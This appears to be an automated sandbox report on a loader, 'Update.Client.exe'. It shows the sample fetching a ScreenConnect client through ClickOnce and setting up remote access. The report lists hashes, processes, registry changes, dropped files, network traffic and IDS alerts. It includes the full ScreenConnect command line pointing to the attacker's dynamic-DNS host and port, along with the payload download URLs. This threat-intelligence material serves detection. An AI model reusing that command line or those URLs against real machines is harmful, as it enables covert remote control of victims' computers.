File name:

Update.Client.exe

Full analysis: https://app.any.run/tasks/6651a752-df6d-464f-949a-798b10e5f366
Verdict: Malicious activity
Threats:

A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection.

Analysis date: February 23, 2025, 04:22:30
OS: Windows 10 Professional (build: 19045, 64 bit)
Tags:
loader
screenconnect
remote
Indicators:
MIME: application/vnd.microsoft.portable-executable
File info: PE32 executable (GUI) Intel 80386, for MS Windows, 5 sections
MD5:

C82B07D77BE6CBC1CD107000A64F05BE

SHA1:

8BC8818ED31F71F8493C33E3B18F341B32D77810

SHA256:

CC074013270A829D25DD8C6D51C77A2B85DD0BF4CD2DA40532CD55745A32885A

SSDEEP:

1536:ohNeDLHPUVkKo2cgigKIhTnH2QjCdqQsWQcdUkBbfqNNK:vDLHcVkKo2cZgKIhTH2U+lU2bfq

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • SCREENCONNECT has been detected (SURICATA)

      • ScreenConnect.ClientService.exe (PID: 2216)
  • SUSPICIOUS

    • Adds/modifies Windows certificates

      • Update.Client.exe (PID: 3040)
      • dfsvc.exe (PID: 5720)
    • Checks Windows Trust Settings

      • dfsvc.exe (PID: 5720)
    • Executable content was dropped or overwritten

      • dfsvc.exe (PID: 5720)
    • The process creates files with name similar to system file names

      • dfsvc.exe (PID: 5720)
    • Reads the date of Windows installation

      • dfsvc.exe (PID: 5720)
      • ScreenConnect.WindowsClient.exe (PID: 3812)
    • Reads security settings of Internet Explorer

      • ScreenConnect.WindowsClient.exe (PID: 3812)
      • ScreenConnect.ClientService.exe (PID: 4444)
      • dfsvc.exe (PID: 5720)
      • ScreenConnect.ClientService.exe (PID: 2216)
      • ScreenConnect.WindowsClient.exe (PID: 5092)
    • Executes as Windows Service

      • ScreenConnect.ClientService.exe (PID: 2216)
    • Screenconnect has been detected

      • ScreenConnect.ClientService.exe (PID: 2216)
    • Creates or modifies Windows services

      • ScreenConnect.ClientService.exe (PID: 2216)
    • SCREENCONNECT mutex has been found

      • ScreenConnect.ClientService.exe (PID: 2216)
    • Reads Internet Explorer settings

      • dfsvc.exe (PID: 5720)
    • Connects to unusual port

      • ScreenConnect.ClientService.exe (PID: 2216)
    • Potential Corporate Privacy Violation

      • ScreenConnect.ClientService.exe (PID: 2216)
    • There is functionality for taking screenshot (YARA)

      • ScreenConnect.ClientService.exe (PID: 2216)
      • ScreenConnect.WindowsClient.exe (PID: 5092)
    • Executes application which crashes

      • Update.Client.exe (PID: 3040)
  • INFO

    • Reads the machine GUID from the registry

      • Update.Client.exe (PID: 3040)
      • dfsvc.exe (PID: 5720)
      • ScreenConnect.WindowsClient.exe (PID: 3812)
      • ScreenConnect.ClientService.exe (PID: 4444)
      • ScreenConnect.ClientService.exe (PID: 2216)
      • ScreenConnect.WindowsClient.exe (PID: 5092)
    • Checks supported languages

      • Update.Client.exe (PID: 3040)
      • dfsvc.exe (PID: 5720)
      • ScreenConnect.WindowsClient.exe (PID: 3812)
      • ScreenConnect.ClientService.exe (PID: 4444)
      • ScreenConnect.ClientService.exe (PID: 2216)
      • ScreenConnect.WindowsClient.exe (PID: 5092)
    • Reads the computer name

      • Update.Client.exe (PID: 3040)
      • dfsvc.exe (PID: 5720)
      • ScreenConnect.ClientService.exe (PID: 4444)
      • ScreenConnect.WindowsClient.exe (PID: 3812)
      • ScreenConnect.ClientService.exe (PID: 2216)
      • ScreenConnect.WindowsClient.exe (PID: 5092)
    • Process checks whether UAC notifications are on

      • dfsvc.exe (PID: 5720)
    • Disables trace logs

      • dfsvc.exe (PID: 5720)
    • Reads Environment values

      • dfsvc.exe (PID: 5720)
    • Checks proxy server information

      • dfsvc.exe (PID: 5720)
      • WerFault.exe (PID: 2136)
    • Process checks computer location settings

      • dfsvc.exe (PID: 5720)
      • ScreenConnect.WindowsClient.exe (PID: 3812)
    • Creates files or folders in the user directory

      • ScreenConnect.WindowsClient.exe (PID: 3812)
      • dfsvc.exe (PID: 5720)
      • WerFault.exe (PID: 2136)
      • ScreenConnect.ClientService.exe (PID: 2216)
    • Create files in a temporary directory

      • dfsvc.exe (PID: 5720)
    • Reads the software policy settings

      • dfsvc.exe (PID: 5720)
      • WerFault.exe (PID: 2136)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.exe | Win32 Executable MS Visual C++ (generic) (42.2)
.exe | Win64 Executable (generic) (37.3)
.dll | Win32 Dynamic Link Library (generic) (8.8)
.exe | Win32 Executable (generic) (6)
.exe | Generic Win/DOS Executable (2.7)

EXIF

EXE

MachineType: Intel 386 or later, and compatibles
TimeStamp: 2024:10:28 17:41:07+00:00
ImageFileCharacteristics: Executable, 32-bit
PEType: PE32
LinkerVersion: 14.39
CodeSize: 40448
InitializedDataSize: 32768
UninitializedDataSize: -
EntryPoint: 0x1489
OSVersion: 5.1
ImageVersion: -
SubsystemVersion: 5.1
Subsystem: Windows GUI
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
125
Monitored processes
8
Malicious processes
2
Suspicious processes
1

Behavior graph

Click at the process to see the details
start update.client.exe dfsvc.exe screenconnect.windowsclient.exe no specs screenconnect.clientservice.exe #SCREENCONNECT screenconnect.clientservice.exe screenconnect.windowsclient.exe no specs svchost.exe werfault.exe

Process information

PID
CMD
Path
Indicators
Parent process
2136C:\WINDOWS\SysWOW64\WerFault.exe -u -p 3040 -s 324C:\Windows\SysWOW64\WerFault.exe
Update.Client.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Problem Reporting
Exit code:
0
Version:
10.0.19041.3996 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\werfault.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\msvcrt.dll
c:\windows\syswow64\combase.dll
2192C:\WINDOWS\system32\svchost.exe -k NetworkService -p -s DnscacheC:\Windows\System32\svchost.exe
services.exe
User:
NETWORK SERVICE
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Host Process for Windows Services
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\svchost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\kernel.appcore.dll
2216"C:\Users\admin\AppData\Local\Apps\2.0\R7P2M60V.1YW\9YX6JECA.QQQ\scre..tion_25b0fbb6ef7eb094_0018.0003_23c5350198a4824d\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=kangs.zapto.org&p=8041&s=b9b61789-b2df-401f-acc8-353cfefd881a&k=BgIAAACkAABSU0ExAAgAAAEAAQBt8GydmSLuUL0rwf9arK5NYD7z7WrABmq8Uzh9zE31Q97LnDTxIZVwBMKTUsuKlLYpBn%2bf6X5fdIbD%2ftv5c%2fvLfwjvbw8EJbtsI40lfM%2fyIZXf4iGQ72nz000p%2fDoWJq0%2fot0u9HnMs7tIP%2b3iM4dIB%2fKqF4ljbFOTUIzo%2by%2f4uNqPdUjUDKkjwIS2RMRnDXymk2UuvwQXBvTx7Az8NN3f2YwOhqorGi%2b5f2RYPQl3FXcl7BQM2TmPkZp324mMjUJjOIMZEzQr%2fWLh6W%2bN5FPaBKOuV3ZZz4TcfKV%2bEwny%2bjRgRDf2%2f7I3CerXq8IdyGdJRk0PW4H8fV1kBmDpTGqh&r=&i=Untitled%20Session" "1"C:\Users\admin\AppData\Local\Apps\2.0\R7P2M60V.1YW\9YX6JECA.QQQ\scre..tion_25b0fbb6ef7eb094_0018.0003_23c5350198a4824d\ScreenConnect.ClientService.exe
services.exe
User:
SYSTEM
Integrity Level:
SYSTEM
Version:
24.3.7.9067
Modules
Images
c:\users\admin\appdata\local\apps\2.0\r7p2m60v.1yw\9yx6jeca.qqq\scre..tion_25b0fbb6ef7eb094_0018.0003_23c5350198a4824d\screenconnect.clientservice.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\shlwapi.dll
c:\windows\syswow64\msvcrt.dll
3040"C:\Users\admin\Desktop\Update.Client.exe" C:\Users\admin\Desktop\Update.Client.exe
explorer.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
3221225477
Modules
Images
c:\users\admin\desktop\update.client.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\crypt32.dll
3812"C:\Users\admin\AppData\Local\Apps\2.0\R7P2M60V.1YW\9YX6JECA.QQQ\scre..tion_25b0fbb6ef7eb094_0018.0003_23c5350198a4824d\ScreenConnect.WindowsClient.exe" C:\Users\admin\AppData\Local\Apps\2.0\R7P2M60V.1YW\9YX6JECA.QQQ\scre..tion_25b0fbb6ef7eb094_0018.0003_23c5350198a4824d\ScreenConnect.WindowsClient.exedfsvc.exe
User:
admin
Company:
ScreenConnect Software
Integrity Level:
MEDIUM
Description:
ScreenConnect Client
Exit code:
0
Version:
24.3.7.9067
Modules
Images
c:\users\admin\appdata\local\apps\2.0\r7p2m60v.1yw\9yx6jeca.qqq\scre..tion_25b0fbb6ef7eb094_0018.0003_23c5350198a4824d\screenconnect.windowsclient.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\mscoree.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
4444"C:\Users\admin\AppData\Local\Apps\2.0\R7P2M60V.1YW\9YX6JECA.QQQ\scre..tion_25b0fbb6ef7eb094_0018.0003_23c5350198a4824d\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=kangs.zapto.org&p=8041&s=b9b61789-b2df-401f-acc8-353cfefd881a&k=BgIAAACkAABSU0ExAAgAAAEAAQBt8GydmSLuUL0rwf9arK5NYD7z7WrABmq8Uzh9zE31Q97LnDTxIZVwBMKTUsuKlLYpBn%2bf6X5fdIbD%2ftv5c%2fvLfwjvbw8EJbtsI40lfM%2fyIZXf4iGQ72nz000p%2fDoWJq0%2fot0u9HnMs7tIP%2b3iM4dIB%2fKqF4ljbFOTUIzo%2by%2f4uNqPdUjUDKkjwIS2RMRnDXymk2UuvwQXBvTx7Az8NN3f2YwOhqorGi%2b5f2RYPQl3FXcl7BQM2TmPkZp324mMjUJjOIMZEzQr%2fWLh6W%2bN5FPaBKOuV3ZZz4TcfKV%2bEwny%2bjRgRDf2%2f7I3CerXq8IdyGdJRk0PW4H8fV1kBmDpTGqh&r=&i=Untitled%20Session" "1"C:\Users\admin\AppData\Local\Apps\2.0\R7P2M60V.1YW\9YX6JECA.QQQ\scre..tion_25b0fbb6ef7eb094_0018.0003_23c5350198a4824d\ScreenConnect.ClientService.exe
ScreenConnect.WindowsClient.exe
User:
admin
Integrity Level:
HIGH
Exit code:
0
Version:
24.3.7.9067
Modules
Images
c:\users\admin\appdata\local\apps\2.0\r7p2m60v.1yw\9yx6jeca.qqq\scre..tion_25b0fbb6ef7eb094_0018.0003_23c5350198a4824d\screenconnect.clientservice.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\shlwapi.dll
5092"C:\Users\admin\AppData\Local\Apps\2.0\R7P2M60V.1YW\9YX6JECA.QQQ\scre..tion_25b0fbb6ef7eb094_0018.0003_23c5350198a4824d\ScreenConnect.WindowsClient.exe" "RunRole" "600d648b-1d33-4766-b455-aaf12018652f" "User"C:\Users\admin\AppData\Local\Apps\2.0\R7P2M60V.1YW\9YX6JECA.QQQ\scre..tion_25b0fbb6ef7eb094_0018.0003_23c5350198a4824d\ScreenConnect.WindowsClient.exeScreenConnect.ClientService.exe
User:
admin
Company:
ScreenConnect Software
Integrity Level:
MEDIUM
Description:
ScreenConnect Client
Version:
24.3.7.9067
Modules
Images
c:\users\admin\appdata\local\apps\2.0\r7p2m60v.1yw\9yx6jeca.qqq\scre..tion_25b0fbb6ef7eb094_0018.0003_23c5350198a4824d\screenconnect.windowsclient.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\mscoree.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
5720"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
Update.Client.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
ClickOnce
Version:
4.8.9037.0 built by: NET481REL1
Modules
Images
c:\windows\microsoft.net\framework64\v4.0.30319\dfsvc.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\mscoree.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
Total events
14 412
Read events
14 215
Write events
167
Delete events
30

Modification events

(PID) Process:(5720) dfsvc.exeKey:HKEY_CLASSES_ROOT\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0
Operation:writeName:ComponentStore_RandomString
Value:
YOM6XV3KD35E3DKK0B7HQ5WX
(PID) Process:(5720) dfsvc.exeKey:HKEY_CLASSES_ROOT\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0
Operation:delete valueName:ComponentStore_RandomString
Value:
YOM6XV3KD35E3DKK0B7HQ5WX
(PID) Process:(5720) dfsvc.exeKey:HKEY_CLASSES_ROOT\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0
Operation:delete keyName:(default)
Value:
(PID) Process:(5720) dfsvc.exeKey:HKEY_CLASSES_ROOT\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0
Operation:writeName:ComponentStore_RandomString
Value:
R7P2M60V1YW9YX6JECAQQQVL
(PID) Process:(5720) dfsvc.exeKey:HKEY_CLASSES_ROOT\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\StateManager
Operation:writeName:StateStore_RandomString
Value:
MYM9C79XZ986WWHB4C5R45LT
(PID) Process:(5720) dfsvc.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\dfsvc_RASAPI32
Operation:writeName:EnableFileTracing
Value:
0
(PID) Process:(5720) dfsvc.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\dfsvc_RASAPI32
Operation:writeName:EnableAutoFileTracing
Value:
0
(PID) Process:(5720) dfsvc.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\dfsvc_RASAPI32
Operation:writeName:EnableConsoleTracing
Value:
0
(PID) Process:(5720) dfsvc.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\dfsvc_RASAPI32
Operation:writeName:FileTracingMask
Value:
(PID) Process:(5720) dfsvc.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\dfsvc_RASAPI32
Operation:writeName:ConsoleTracingMask
Value:
Executable files
16
Suspicious files
22
Text files
26
Unknown types
0

Dropped files

PID
Process
Filename
Type
5720dfsvc.exeC:\Users\admin\AppData\Local\Temp\Deployment\YBR6BAMO.8D2\DL8EWAAM.PGD\ScreenConnect.WindowsBackstageShell.exeexecutable
MD5:AFA97CAF20F3608799E670E9D6253247
SHA256:E25F32BA3FA32FD0DDD99EB65B26835E30829B5E4B58573690AA717E093A5D8F
5720dfsvc.exeC:\Users\admin\AppData\Local\Temp\Deployment\YBR6BAMO.8D2\DL8EWAAM.PGD\ScreenConnect.WindowsClient.exe.configxml
MD5:728175E20FFBCEB46760BB5E1112F38B
SHA256:87C640D3184C17D3B446A72D5F13D643A774B4ECC7AFBEDFD4E8DA7795EA8077
5720dfsvc.exeC:\Users\admin\AppData\Local\Temp\Deployment\YBR6BAMO.8D2\DL8EWAAM.PGD\ScreenConnect.WindowsFileManager.exeexecutable
MD5:1AEE526DC110E24D1399AFFCCD452AB3
SHA256:EBD04A4540D6E76776BD58DEEA627345D0F8FBA2C04CC65BE5E979A8A67A62A1
5720dfsvc.exeC:\Users\admin\AppData\Local\Temp\Deployment\YBR6BAMO.8D2\DL8EWAAM.PGD\ScreenConnect.WindowsClient.exeexecutable
MD5:1778204A8C3BC2B8E5E4194EDBAF7135
SHA256:600CF10E27311E60D32722654EF184C031A77B5AE1F8ABAE8891732710AFEE31
5720dfsvc.exeC:\Users\admin\AppData\Local\Temp\Deployment\BVNR8NEQ.5JB\EALZ9X5K.9DO.applicationxml
MD5:85C8AA171EF8213B725157DCE97AF6CD
SHA256:D27D1439C1809AE8EDA24F17C9FF9B50271A54D9F200A6793A406B86182B6552
5720dfsvc.exeC:\Users\admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-1693682860-607145093-2874071422-1001\932a2db58c237abd381d22df4c63a04a_bb926e54-e3ca-40fd-ae90-2764341e7792binary
MD5:D2DED43CE07BFCE4D1C101DFCAA178C8
SHA256:8EEE9284E733B9D4F2E5C43F71B81E27966F5CD8900183EB3BB77A1F1160D050
5720dfsvc.exeC:\Users\admin\AppData\Local\Temp\Deployment\YBR6BAMO.8D2\DL8EWAAM.PGD\ScreenConnect.ClientService.dllexecutable
MD5:5DB908C12D6E768081BCED0E165E36F8
SHA256:FD5818DCDF5FC76316B8F7F96630EC66BB1CB5B5A8127CF300E5842F2C74FFCA
5720dfsvc.exeC:\Users\admin\AppData\Local\Temp\Deployment\YBR6BAMO.8D2\DL8EWAAM.PGD\ScreenConnect.WindowsClient.exe:Zone.Identifiertext
MD5:FBCCF14D504B7B2DBCB5A5BDA75BD93B
SHA256:EACD09517CE90D34BA562171D15AC40D302F0E691B439F91BE1B6406E25F5913
5720dfsvc.exeC:\Users\admin\AppData\Local\Temp\Deployment\YBR6BAMO.8D2\DL8EWAAM.PGD\ScreenConnect.WindowsBackstageShell.exe.configxml
MD5:728175E20FFBCEB46760BB5E1112F38B
SHA256:87C640D3184C17D3B446A72D5F13D643A774B4ECC7AFBEDFD4E8DA7795EA8077
5720dfsvc.exeC:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8EC9B1D0ABBD7F98B401D425828828CE_BE4413523710330F97BEE5D4A544C42Bbinary
MD5:DDC076E0C339283564037D69C7823376
SHA256:10C61D67F7CAEE4131FDA65993471667063E13472AB6644B218A7BC90FFD1077
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
19
TCP/UDP connections
24
DNS requests
12
Threats
9

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
2144
RUXIMICS.exe
GET
200
23.216.77.28:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
4504
svchost.exe
GET
200
23.216.77.28:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
2144
RUXIMICS.exe
GET
200
95.101.149.131:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
whitelisted
GET
200
51.79.171.167:443
https://wise.screennect.com/Bin/ScreenConnect.Client.manifest
unknown
unknown
5720
dfsvc.exe
GET
200
184.30.131.245:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSRXerF0eFeSWRripTgTkcJWMm7iQQUaDfg67Y7%2BF8Rhvv%2BYXsIiGX0TkICEAuTYAUbzPZmQpmJmNW6l84%3D
unknown
whitelisted
5720
dfsvc.exe
GET
200
184.30.131.245:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTfIs%2BLjDtGwQ09XEB1Yeq%2BtX%2BBgQQU7NfjgtJxXWRM3y5nP%2Be6mK4cD08CEAitQLJg0pxMn17Nqb2Trtk%3D
unknown
whitelisted
GET
200
51.79.171.167:443
https://wise.screennect.com/Bin/ScreenConnect.WindowsBackstageShell.exe
unknown
unknown
GET
200
51.79.171.167:443
https://wise.screennect.com/Bin/ScreenConnect.WindowsFileManager.exe.config
unknown
unknown
GET
200
51.79.171.167:443
https://wise.screennect.com/Bin/ScreenConnect.WindowsClient.exe.config
unknown
unknown
GET
200
51.79.171.167:443
https://wise.screennect.com/Bin/ScreenConnect.WindowsBackstageShell.exe.config
unknown
unknown
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
4504
svchost.exe
40.127.240.158:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
4
System
192.168.100.255:137
whitelisted
2144
RUXIMICS.exe
40.127.240.158:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
40.127.240.158:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
51.104.136.2:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
4
System
192.168.100.255:138
whitelisted
5720
dfsvc.exe
51.79.171.167:443
wise.screennect.com
OVH SAS
SG
suspicious
4504
svchost.exe
23.216.77.28:80
crl.microsoft.com
Akamai International B.V.
DE
whitelisted
2144
RUXIMICS.exe
23.216.77.28:80
crl.microsoft.com
Akamai International B.V.
DE
whitelisted
2144
RUXIMICS.exe
95.101.149.131:80
www.microsoft.com
Akamai International B.V.
NL
whitelisted

DNS requests

Domain
IP
Reputation
settings-win.data.microsoft.com
  • 40.127.240.158
  • 51.104.136.2
  • 20.73.194.208
whitelisted
google.com
  • 216.58.212.142
whitelisted
wise.screennect.com
  • 51.79.171.167
malicious
crl.microsoft.com
  • 23.216.77.28
  • 23.216.77.6
whitelisted
www.microsoft.com
  • 95.101.149.131
whitelisted
ocsp.digicert.com
  • 184.30.131.245
whitelisted
kangs.zapto.org
  • 51.79.171.167
unknown
watson.events.data.microsoft.com
  • 20.42.73.29
whitelisted
self.events.data.microsoft.com
  • 20.189.173.17
whitelisted

Threats

PID
Process
Class
Message
Potential Corporate Privacy Violation
ET INFO PE EXE or DLL Windows file download HTTP
Misc activity
ET INFO Packed Executable Download
A Network Trojan was detected
ET MALWARE Possible Windows executable sent when remote host claims to send html content
Misc activity
ET INFO EXE IsDebuggerPresent (Used in Malware Anti-Debugging)
A Network Trojan was detected
ET MALWARE Possible Windows executable sent when remote host claims to send html content
A Network Trojan was detected
ET MALWARE Possible Windows executable sent when remote host claims to send html content
A Network Trojan was detected
ET MALWARE Possible Windows executable sent when remote host claims to send html content
2192
svchost.exe
Potentially Bad Traffic
ET DYN_DNS DNS Query to DynDNS Domain *.zapto .org
2216
ScreenConnect.ClientService.exe
Potential Corporate Privacy Violation
REMOTE [ANY.RUN] ScreenConnect Server Response
Process
Message
dfsvc.exe
*** Status originated: -1073741811 *** Source File: onecore\com\netfx\windowsbuilt\iso_legacy\base\isolation\hier_hierarchy.cpp, line 230
dfsvc.exe
*** Status originated: -1073741811 *** Source File: onecore\com\netfx\windowsbuilt\iso_legacy\base\isolation\hier_hierarchy.cpp, line 230
dfsvc.exe
*** Status originated: -1073741811 *** Source File: onecore\com\netfx\windowsbuilt\iso_legacy\base\isolation\hier_hierarchy.cpp, line 230
dfsvc.exe
*** Status originated: -1073741811 *** Source File: onecore\com\netfx\windowsbuilt\iso_legacy\base\isolation\hier_hierarchy.cpp, line 230
dfsvc.exe
*** Status originated: -1073741772 *** Source File: onecore\com\netfx\windowsbuilt\iso_legacy\base\isolation\win32\isoreg_direct.cpp, line 1127
dfsvc.exe
*** Status originated: -1073741772 *** Source File: onecore\com\netfx\windowsbuilt\iso_legacy\base\isolation\win32\isoreg_direct.cpp, line 1127
dfsvc.exe
*** Status originated: -1073741811 *** Source File: onecore\com\netfx\windowsbuilt\iso_legacy\base\isolation\hier_hierarchy.cpp, line 230
dfsvc.exe
*** Status originated: -1073741811 *** Source File: onecore\com\netfx\windowsbuilt\iso_legacy\base\isolation\hier_hierarchy.cpp, line 230
dfsvc.exe
*** Status originated: -1073741811 *** Source File: onecore\com\netfx\windowsbuilt\iso_legacy\base\isolation\hier_hierarchy.cpp, line 230
dfsvc.exe
*** Status originated: -1073741811 *** Source File: onecore\com\netfx\windowsbuilt\iso_legacy\base\isolation\hier_hierarchy.cpp, line 230